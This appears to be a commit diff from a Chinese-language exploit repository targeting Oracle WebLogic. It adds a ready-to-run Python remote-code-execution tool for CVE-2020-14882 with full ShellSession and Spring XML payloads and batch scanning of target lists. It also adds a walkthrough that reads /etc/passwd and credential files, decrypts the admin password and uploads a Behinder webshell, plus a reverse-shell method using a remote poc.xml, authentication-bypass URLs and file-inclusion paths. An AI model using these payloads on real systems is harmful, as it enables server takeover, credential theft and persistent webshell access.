优化目录

00-CVE_EXP/CVE-2018-2628 weblogic 反序列化漏洞/readme.md

@@ -1,5 +1,5 @@
-# weblogic反序列化漏洞批量检测脚本
----
+## weblogic反序列化漏洞批量检测脚本
+
 ### Reference
 *　https://xz.aliyun.com/t/2292
 

00-CVE_EXP/CVE-2019-2618 弱口令&任意文件上传漏洞/README.MD

@@ -0,0 +1,43 @@
+# CVE-2019-2618 弱口令&任意文件上传漏洞
+
+> 利用任意文件读取来获取weblogic的弱口令登录进入后台，然后通过上传getshell，通过构造任意文件下载漏洞环境读取到后台用户名和密码，然后登陆进后台，上传webshell。
+
+## 影响版本
+   WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
+   
+## 漏洞复现
+1. 任意文件读取  
+    访问`http://IP:7001/hello/file.jsp?path=/etc/passwd` 成功获取到账号和密码
+    
+    ![任意文件读取](images/任意文件读取.png)  ![pass](images/password.png)
+    
+     不过只能读取一些文件，如何更深层次利用这个漏洞呢？weblogic密码使用AES（老版本3DES）加密，对称加密可解密，只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下，名为SerializedSystemIni.dat和config.xml。SerializedSystemIni.dat是一个二进制文件，所以一定要用burpsuite来读取，用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码，这就是密钥，右键copy to file就可以保存成一个文件：
+     
+     `http://yourIp:7001/hello/file.jsp?path=security/SerializedSystemIni.dat`
+     
+     ![SerializedSystemIni.dat](images/SerializedSystemIni.dat.png)
+     
+      config.xml是base_domain的全局配置文件，所以乱七八糟的内容比较多，找到其中的的值，即为加密后的管理员密码
+      
+      `http://yourIP:7001/hello/file.jsp?path=config/config.xml`
+      
+      ![config.xml](images/config.xml.png)
+      
+      使用解密工具进行解密
+      
+      ![decrypt](images/decrypt.png)
+      
+  2. 后台上传getshell  
+    使用解密后的账号密码登录后台，weblogic常见的弱密码  
+    `https://cirt.net/passwords?criteria=weblogic 
+     这里使用 用户名:weblogic 密码:Oracle@123 登录`
+     
+     进入后台后点击左边的部署，找到可以上传文件的地址  
+     ![deploy](images/deploy.png)  
+     这里使用冰蝎里面自带的jsp一句话生成war马  
+     `jar -cvf shell.war shell.jsp`  
+      生成war后将war马部署上去  
+     ![muma1](images/muma1.png)  
+     ![muma1](images/muma2.png)  
+     使用冰蝎进行连接(默认密码为rebeyond)，成功getshell  
+     ![muma1](images/muma3.png)  

00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/CVE-2020-14882_ALL.py

@@ -0,0 +1,109 @@
+#coding:utf-8
+import requests
+import sys
+import argparse
+import http.client
+
+http.client.HTTPConnection._http_vsn = 10
+http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
+
+requests.packages.urllib3.disable_warnings()
+
+
+#功能1方法：回显命令执行。
+def command(url_cmd,headers_cmd,url):
+	try:
+		res = requests.get(url_cmd, headers = headers_cmd,timeout = 15, verify = False)
+		if "<html" not in res.text and "<TITLE" not in res.text :
+			print ("[+] Command success result:")
+			print (res.text)
+
+		else:
+			print ("[-] " + url + " not vulnerable or command error!")
+	except Exception as e:
+		#print (e)
+		print ("[-] " + url + " not vulnerable or command error!")
+
+
+#功能2方法：无回显，命令执行,适用于Weblogic 10.x、12.x。
+def weblogic_12(url_cmd,post_12,headers_12):
+	try:
+		res = requests.post(url_cmd, data = post_12, headers = headers_12,timeout = 15, verify = False)
+		#print ("[+] Attack complete!")
+	except Exception as e:
+		print ("[+] Attack complete!")
+
+def main():
+	banner = """  _______      ________    ___   ___ ___   ___        __ _  _   ___   ___ ___  
+ / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | || | / _ \ / _ \__ \ 
+| |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | || || (_) | (_) | ) |
+| |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |__   _> _ < > _ < / / 
+| |____   \  /  | |____    / /_| |_| / /_| |_| |      | |  | || (_) | (_) / /_ 
+ \_____|   \/   |______|  |____|\___/____|\___/       |_|  |_| \___/ \___/____|
+                                                                               
+                                                         Author:GGyao
+                                                         Github:https://github.com/GGyao
+
+"""
+
+	print (banner)
+	parser = argparse.ArgumentParser()
+	parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port。")
+	parser.add_argument("-f", "--file", help="Target File; Example:target.txt。")
+	parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
+	parser.add_argument("-x", "--xml", help="Remote XML file; Example:http://vpsip/poc.xml; ")
+	args = parser.parse_args()
+
+	#功能1：命令回显。
+	if args.url != None and args.cmd != None:
+		url = args.url
+		url_cmd = args.url + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
+		headers_cmd = {
+		'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
+		'cmd':args.cmd,
+		'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+		'Content-Type':'application/x-www-form-urlencoded'
+		}
+
+		#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""
+
+	
+		#command(url_cmd,post_cmd,headers_cmd,url)
+		command(url_cmd,headers_cmd,url)
+
+	#功能2：weblogic 12.x命令执行。
+	if args.url != None and args.xml != None:
+		url_cmd = args.url + '/console/images/%252e%252e/console.portal'
+		headers_12 = {
+		'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
+		'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+		'Content-Type':'application/x-www-form-urlencoded'
+		}
+
+		post_12 = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22{}%22)""".format(args.xml)
+
+		weblogic_12(url_cmd,post_12,headers_12)
+
+	# 功能3：回显命令执行批量。
+	if args.file != None and args.cmd != None:
+		#print (1)
+		for File  in open(args.file):
+			File = File.strip()
+			url_cmd = File + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
+			print ("[*] >>> Test:" + File)
+
+			url = File
+			headers_cmd = {
+			'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
+			'cmd':args.cmd,
+			'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+			'Content-Type':'application/x-www-form-urlencoded'
+			}
+
+
+			#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""
+			command(url_cmd,headers_cmd,url)
+
+
+if __name__=="__main__":
+	main()

00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/README.md

@@ -0,0 +1,56 @@
+# CVE-2020-14882 RCE 漏洞
+>CVE-2020-14882_ALL综合利用工具，支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。
+>
+>需要模块：requests、http.client
+
+
+### 选项
+
+![](./images/1.png)
+
+### 功能一：命令回显
+python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"
+
+![](./images/2.png)
+
+python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"
+
+![](./images/3.png)
+
+### 功能二：批量命令回显
+```shell script
+python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"
+```
+> target.txt 格式：http://x.x.x.x:xx，一行一个。
+
+![](./images/4.png)
+
+### 功能三：外置xml文件无回显命令执行
+1. Linux反弹shell为例，编辑好poc.xml文件，开启python监听。  
+
+```xml
+<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
+  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
+    <constructor-arg>
+      <list>
+	<value>cmd</value>
+      </list>
+    </constructor-arg>
+  </bean>
+</beans>
+```
+
+开启python监听。  
+![](./images/5.png)
+
+nc开启监听。  
+![](./images/6.png)
+
+2. 使用-x选项指定xml文件路径，发送payload。  
+```shell script
+python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml
+```
+![](./images/7.png)  
+3. 成功接收shell。  
+![](./images/8.png)
+

00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/poc.xml

@@ -0,0 +1,9 @@
+<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
+  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
+    <constructor-arg>
+      <list>
+	<value>cmd</value>
+      </list>
+    </constructor-arg>
+  </bean>
+</beans>

00-CVE_EXP/CVE-2020-14882 weblogic RCE 漏洞/target.txt

@@ -0,0 +1,2 @@
+http://1.1.1.1:xx
+http://1.1.1.1:xx

00-CVE_EXP/CVE-2020-14883 未授权访问/README.MD

@@ -0,0 +1,12 @@
+# weblogic 未授权访问漏洞
+>   远程攻击者可以构造特殊的HTTP请求，在未经身份验证的情况下接管 WebLogic Server Console。权限绕过漏洞（CVE-2020-14883），访问以下URL，未授权访问到管理后台页面（低权限的用户）
+>
+
+```shell script
+/console/images/%252E%252E%252Fconsole.portal
+/console/css/%252e%252e%252fconsole.portal  （小写可绕过补丁）
+/console/css/%25%32%65%25%32%65%25%32%66console.portal
+```
+
+![console](images/console.png)    
+此时的权限很低，并不能在后台安装应用

00-CVE_EXP/WebLogic Server 14.1.1.0.0 本地文件包含/readme.md

@@ -0,0 +1,18 @@
+# Oracle WebLogic Server 14.1.1.0.0 -  本地文件包含
+
+
+
+## 受影响版本
+
+```txt
+12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
+```
+
+## poc
+
+```txt
+GET .//META-INF/MANIFEST.MF
+GET .//WEB-INF/web.xml
+GET .//WEB-INF/portlet.xml
+GET .//WEB-INF/weblogic.xml
+```